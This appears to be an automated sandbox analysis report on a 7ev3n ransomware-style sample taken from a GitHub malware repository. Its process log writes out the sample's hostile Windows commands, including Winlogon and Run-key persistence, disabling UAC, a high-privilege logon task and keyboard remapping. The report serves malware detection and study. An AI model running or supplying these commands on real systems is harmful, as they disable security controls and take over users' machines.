Analysis Overview
Threat Level: Known bad
The file https://github.com/Da2dalus/The-MALWARE-Repo was found to be: Known bad.
Malicious Activity Summary
Modifies WinLogon for persistence
UAC bypass
Downloads MZ/PE file
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
System Location Discovery: System Language Discovery
Browser Information Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks processor information in registry
Suspicious use of WriteProcessMemory
Modifies registry class
Enumerates system info in registry
Modifies data under HKEY_USERS
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-05-15 12:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-15 12:17
Reported
2025-05-15 12:18
Platform
win10v2004-20250502-en
Max time kernel
49s
Max time network
51s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\7ev3n.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\7ev3n.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\system.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\system.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Browser Information Discovery
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\7ev3n.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\7ev3n.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\system.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\system.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133917850573289134" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-186956858-2143653872-2609589082-1000\{56EE996B-4B2C-4C1A-A76B-6DC8063771A6} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2d8,0x7ffd8017f208,0x7ffd8017f214,0x7ffd8017f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1900,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2296,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2292 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2396,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2428 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4240,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4296,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3504,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3672,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5328 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5096,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5300,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6068,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6104 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6264,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6284 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6348,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6172 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6184,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6212 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6604,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6616 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6776 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6936 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6804 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=704,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4484 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6080,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4304 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5292,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=120 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=6416,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7132,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6592,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4304 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6076,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:8
C:\Users\Admin\Downloads\7ev3n.exe
"C:\Users\Admin\Downloads\7ev3n.exe"
C:\Users\Admin\Downloads\7ev3n.exe
"C:\Users\Admin\Downloads\7ev3n.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
C:\Windows\SysWOW64\SCHTASKS.exe
C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
C:\Users\Admin\AppData\Local\system.exe
"C:\Users\Admin\AppData\Local\system.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
C:\Windows\SysWOW64\SCHTASKS.exe
C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
C:\Windows\SysWOW64\reg.exe
